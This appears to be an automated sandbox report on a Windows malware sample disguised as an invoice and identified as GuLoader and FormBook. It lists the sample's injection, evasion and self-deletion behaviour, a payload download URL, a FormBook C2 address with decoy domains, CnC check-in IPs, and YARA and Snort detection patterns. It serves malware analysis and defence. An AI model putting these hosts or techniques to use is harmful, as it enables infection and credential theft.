Play interactive tour

Edit tour

Windows Analysis Report draft_inv dec21.exe

Overview

General Information

Sample Name:	draft_inv dec21.exe
Analysis ID:	531747
MD5:	89a584acaeb2f9e8baf46714eb7d3550
SHA1:	263ff0b238d57cfc30492f8801530b9986dcae38
SHA256:	59ae017767f6a56eba79abdad1343cba3643744f4668b320c30fda283abdedf2
Infos:
Most interesting Screenshot:

Detection

GuLoader FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Generic Dropper

Multi AV Scanner detection for submitted file

Yara detected FormBook

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

GuLoader behavior detected

Sigma detected: Suspect Svchost Activity

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Performs DNS queries to domains with low reputation

Self deletion via cmd delete

Sigma detected: Suspicious Svchost Process

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Tries to resolve many domain names, but no domain seems valid

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Connects to many different domains

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Enables debug privileges

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

draft_inv dec21.exe (PID: 5460 cmdline: "C:\Users\user\Desktop\draft_inv dec21.exe" MD5: 89A584ACAEB2F9E8BAF46714EB7D3550)

draft_inv dec21.exe (PID: 2748 cmdline: "C:\Users\user\Desktop\draft_inv dec21.exe" MD5: 89A584ACAEB2F9E8BAF46714EB7D3550)

explorer.exe (PID: 4580 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

svchost.exe (PID: 1340 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: B7C999040D80E5BF87886D70D992C51E)

cmd.exe (PID: 7068 cmdline: /c del "C:\Users\user\Desktop\draft_inv dec21.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

UserOOBEBroker.exe (PID: 1968 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin"}

Threatname: FormBook

{"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.11094891807.0000000004057000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x3494:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000000.6378969703.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: draft_inv dec21.exe PID: 2748	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: svchost.exe PID: 1340	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Click to see the 21 entries

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity

Show sources

Source: Process started

Author: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4580, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1340

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4580, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1340

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4580, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1340

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}
Source: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin"}

Multi AV Scanner detection for submitted file

Show sources

Source: draft_inv dec21.exe	Virustotal: Detection: 26%	Perma Link
Source: draft_inv dec21.exe	Metadefender: Detection: 20%	Perma Link
Source: draft_inv dec21.exe	ReversingLabs: Detection: 17%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: http://www.dif-directory.xyz/n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c	Avira URL Cloud: Label: phishing
Source: http://www.receiptpor.xyz/n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr	Avira URL Cloud: Label: phishing
Source: http://www.dubaicars.online/n8ds/?3fkxqn=hXcDbfFHWB34bR8p&gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs	Avira URL Cloud: Label: phishing
Source: http://www.dubaicars.online/n8ds/?gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs&pB=z2JtXhtxAhidvN	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Te6-t4\zbcdidj04hd0ibmx.exe	Metadefender: Detection: 20%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\Te6-t4\zbcdidj04hd0ibmx.exe	ReversingLabs: Detection: 17%

Source: 11.2.svchost.exe.405796c.4.unpack	Avira: Label: TR/Dropper.Gen
Source: 11.2.svchost.exe.3418000.1.unpack	Avira: Label: TR/Dropper.Gen

Source: draft_inv dec21.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 162.241.120.147:443 -> 192.168.11.20:49790 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: draft_inv dec21.exe, 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6917984326.0000000003700000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6922850532.0000000003900000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: draft_inv dec21.exe, draft_inv dec21.exe, 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 0000000B.00000003.6917984326.0000000003700000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.11090669894.0000000003B00000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000002.11092255900.0000000003C2D000.00000040.00000001.sdmp, svchost.exe, 0000000B.00000003.6922850532.0000000003900000.00000004.00000001.sdmp
Source:	Binary string: svchost.pdb source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6918937488.00000000000D0000.00000040.00020000.sdmp
Source:	Binary string: svchost.pdbUGP source: draft_inv dec21.exe, 00000008.00000003.6914968554.00000000008E2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6918937488.00000000000D0000.00000040.00020000.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 164.155.212.139:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 164.155.212.139:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 164.155.212.139:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49794 -> 44.227.76.166:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49794 -> 44.227.76.166:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49794 -> 44.227.76.166:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 216.250.120.206:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 216.250.120.206:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 216.250.120.206:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49804 -> 35.244.144.199:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49804 -> 35.244.144.199:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49804 -> 35.244.144.199:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 185.68.16.57:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 185.68.16.57:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 185.68.16.57:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.82.227:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.82.227:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49812 -> 104.21.82.227:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49813 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49813 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49813 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 34.237.47.210:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 34.237.47.210:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 34.237.47.210:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 185.68.16.57:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 185.68.16.57:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 185.68.16.57:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 35.244.144.199:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 35.244.144.199:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49822 -> 35.244.144.199:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 44.227.76.166:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 44.227.76.166:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49823 -> 44.227.76.166:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.217 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.244.144.199 80	Jump to behavior
